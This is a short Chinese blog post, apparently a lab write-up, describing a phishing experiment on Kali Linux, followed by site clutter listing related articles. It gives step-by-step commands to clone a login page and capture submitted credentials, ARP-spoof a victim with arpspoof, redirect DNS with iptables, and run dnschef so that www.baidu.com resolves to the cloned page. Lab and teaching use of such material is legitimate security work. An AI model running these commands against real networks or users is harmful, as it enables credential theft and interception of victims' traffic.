setlook钓鱼实验流程

最新推荐文章于 2024-06-14 13:37:51 发布
最新推荐文章于 2024-06-14 13:37:51 发布
阅读量68 收藏
点赞数 1
文章标签: 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_58428481/article/details/132378162
版权

 kali输入setlook后 输入1232,然后输入网站进行克隆,网站需要http的

 可在需要钓鱼的虚拟机上输入kali的ip来检查克隆网站是否搭建成立

 此时输入密码账号后他会跳转到原真实网站,但在kali上面已经捕获到了账号和密码

 

1.dnschef实现DNS欺骗

echo 0 > /proc/sys/net/ipv4/ip_forward 
在kali上另开一个终端,输入以上命令,其中echo哪张网卡联通外网这用哪张,此处我用的echo0来联通的外网。

arpspoof  -t 目标IP -r 网关 -i 自己网卡信息

例:arpspoof -t 192.168.10.133 -r 192.168.10.2 -i eth0

.kali截取DNS查询请求并转发至自己进行DNS欺骗:

        # iptables -t nat -A PREROUTING -i eth0 -p udp --dport 53 -j REDIRECT --to-ports 53

        上面关于iptables命令作用是在kali的eth1接收到目标为udp 53流量后重新定向到自己的53端口上,而自己的53端口已经监听为dnschef。

 

实施攻击:

        # dnschef --fakedomains www.baidu.com --fakeip 192.168.10.128 --nameserver 61.139.2.69 -i 192.168.10.128

--fakedomains www.baidu.com:指定要欺骗的域名,即我们钓鱼的网页。

--fakeip 192.168.10.128:指定当请求欺骗域名时返回的虚假 IP 地址,这里是192.168.10.128

--nameserver 61.139.2.69:指定真实的 DNS 服务器 IP 地址,这里是 61.139.2.69

后面的-i 任然是kali的ip

 

 实现正常访问百度页面进入我们克隆的网页,输入账号密码有kali正常捕获

 

 

JO品瀚
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
钓鱼邮件自动化分析流程.docx
04-16
钓鱼邮件自动化分析流程
实验arp攻击dns欺骗网站钓鱼分析
11-25
arp协议分析实验报告,实验arp攻击dns欺骗网站钓鱼分析实验arp攻击dns欺骗网站钓鱼分析,课程实验报告喜欢的同学可以下载学习
钓鱼网站原理实验
weixin_42299610的博客
12-08 2619
实验环境:一台Windows 2003(WA)作为客户机,一台Linux(LB)作为服务器。 1.LB设置网络适配器 2.LB配置eth0(vim /etc/sysconfig/network-scripts/ifcfg-eth0) 3.LB将eth0的内容copy一份到eth1 4.LB配置eth1,将复制eth0内容修改(vim /etc/sysconfig/network-script...
kali系统实现钓鱼邮件实验
qq_39706166的博客
05-21 892
使用Kali完成钓鱼邮件攻击测试
社工钓鱼网站实验
Sig的博客
03-14 2891
社会工程学(Social Engineering) 社会工程学是一种通过人际交流的方式获得信息的非技术渗透手段。不幸的是,这种手段非常有效,而且应用效率极高。事实上,社会工程学已是企业安全最大的威胁之一。 (引自百度百科:社会工程学) 拓扑 需求 某网络拓扑图如图所示,局域网部署两台虚拟机,一台作为攻击者(Hacker),一台作为正常用户(Client)。(PS:若两台均为虚拟机,虚拟机网络...
DNS毒化污染 钓鱼实验
m0_51498031的博客
04-23 2961
1、将kali和win7 桥接到物理的网卡,并且检测互通和外网也能相通: 2、在kali上 修改 erttercap 的配置文件 vim /etc/ettercap/etter.dns *  A   192.168.0.107 *  PTR   192.168.0.107 ( A和PTR 指向的地址是kali自己的地址 ) 3、启动Apache服务器 service apache2 start 4、启动 ettercap 图像化界面 ettercap -G: 在对ett...
wifipumpkin3无线钓鱼实验指导
QanL_的博客
06-14 3029
信息安全周互动场景之无线钓鱼
Python实现简单小猫钓鱼流程
qq_39451322的博客
01-03 1670
Python实现简单小猫钓鱼流程 思路: 生成牌(52张普通牌和大小王) 洗牌(把牌打乱) 分发牌 出牌 判断桌面上牌的状态 把赢得的牌给相对应的人 从桌面上删除刚刚赢的牌 # -- coding:utf-8 -- # @Time : 2021/1/2--16:53 # @Author : ChinaV # @File : t-11.py # coding = 'gbk' import random card = [] # 生成牌 for i in range(1, 10): card.app
邮件钓鱼实验之Gophish
AlbertJay的博客
07-21 6549
一、工具下载 相关钓鱼平台工具:Gophish 下载地址:https://github.com/gophish/gophish/releases/ 二、环境搭建 下载后解压到本地,打开gophishing.exe即可运行服务 它在本地80端口开启钓鱼网站,因此如果不是内网钓鱼环境,需要将其架设在公网服务器上。默认端口3333,默认用户名密码为:admin/gophish。 后台登陆页面 进入后台即可进行实战配置 三、实战配置GoPhish 1、配置发送的邮箱信息 这里用的是QQ的邮箱(注:无
网络安全实验3 漏洞扫描
热门推荐
一半西瓜的博客
11-02 1万+
赞赏码 & 联系方式 & 个人闲话 【实验名称】漏洞扫描 【实验目的】 1.熟悉X-Scan工具的使用方法; 2.熟悉FTPScan工具的使用方法; 3.会使用工具查找主机漏洞 4.学会对弱口令的利用 5.了解开启主机默认共享以及在命令提示下开启服务的方法 6.通过实验了解如何提高主机的安全性 【实验原理】 漏洞扫描是一种网络安全扫描技术,它基于局域...
社工实验:邮件钓鱼
蚁景网安学院
01-11 1760
点击上方蓝色字体,关注我们数据泄露事件与社会工程学事件和鱼叉式网络钓鱼攻击有关。网络钓鱼攻击通常是电子邮件钓鱼,然后骗取受害者点击恶意链接,最后使用恶意的漏洞Payload攻击受害者计算...
算法分析与设计(实验流程图)
05-24
右鸽钓鱼 Description 众所周知,右鸽最大的兴趣爱好非钓鱼莫属了。最近,他又准备去钓鱼了。但是他又不想太无聊,于是他想约上他的好友们。 已知右鸽有n个好友,但是他们的钓鱼水平参差不齐(能力值不同),...
C++算法实验右鸽AC自动机右鸽的多人运动右鸽钓鱼右鸽剪彩带.zip
12-10
C++算法实验右鸽AC自动机右鸽的多人运动右鸽钓鱼右鸽剪彩带.zip
钓鱼技巧.pptx
01-18
钓鱼技巧,钓鱼技巧课件,钓鱼技巧PPT
工业网关在智能制造中的具体应用和效果-天拓四方
最新发布
2401_84969963的博客
06-14 599
通过对数据的处理和分析,我们可以获得设备的运行状态、生产效率、故障预警等信息,为企业提供决策支持和优化建议。未来,随着技术的不断进步和应用场景的拓展,工业网关将在智能制造领域发挥更加重要的作用,为企业创造更多的价值。网关设备通过有线或无线方式与生产设备进行连接,实时收集设备的运行状态、生产数据等信息,并将数据通过安全可靠的通信协议传输至企业的数据中心或云平台。通过工业网关的应用,企业实现了对生产设备的实时监控和数据分析,能够及时发现并解决设备故障和生产瓶颈,提高生产效率。
创建Docker容器与外部机通信(端口映射的方式)
m0_52980547的博客
06-14 579
首先,创建一个自定义的Docker网络,这样可以更好地控制容器间的通信以及容器与外部网络的交互。自定义网络允许你为容器分配固定的IP地址。这个命令创建了一个名为mynetwork的网络,使用了172.18.0.0/16作为子网。
cs61C | lecture4
DaphneOdera17的博客
06-10 672
## Stack在最顶部,向下增长。包含局部变量和 function frame information。栈指针(SP, Stack Pointer) 告诉我们最低(当前)stack frame 在哪里。当进程结束时,SP 会移动回之前的位置,但是数据会保留(现在变成 garbage)。```ca(0);return 1;b(1);c(2);d(4);```!!以下错误代码:```cint y;y = 3;return &y;/* 3 *//*?*/
智能驾驶时代:车联网需要怎样的智能网络底座?
syscloud123的博客
06-11 948
2024年,智能驾驶市场火热,无论是造车新势力还是老牌车企纷纷发力智能驾驶,他们深知,新能源汽车的下半场已到,再不发力智能驾驶,可能真的有些来不及了。车企不断加码单车智能的同时,政府也在稳步的推进车路协同。智能驾驶领域一直处在新技术广泛应用和验证的前沿,让我们一起探索智能驾驶的发展将给我们带来哪些启示。2024年年初,工业和信息化部、公安部等5部门印发,提出智能网联汽车“车路云一体化”协同发展的系列政策举措。
401基础认证钓鱼实验结果分析
04-27
401基础认证钓鱼实验是一种网络安全攻击技术,其目的是欺骗用户向攻击者提供其用户名和密码等敏感信息。通过对实验结果的分析,可以了解攻击者可能采用的方法和用户应该如何防范此类攻击。 在实验中,攻击者会伪造...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值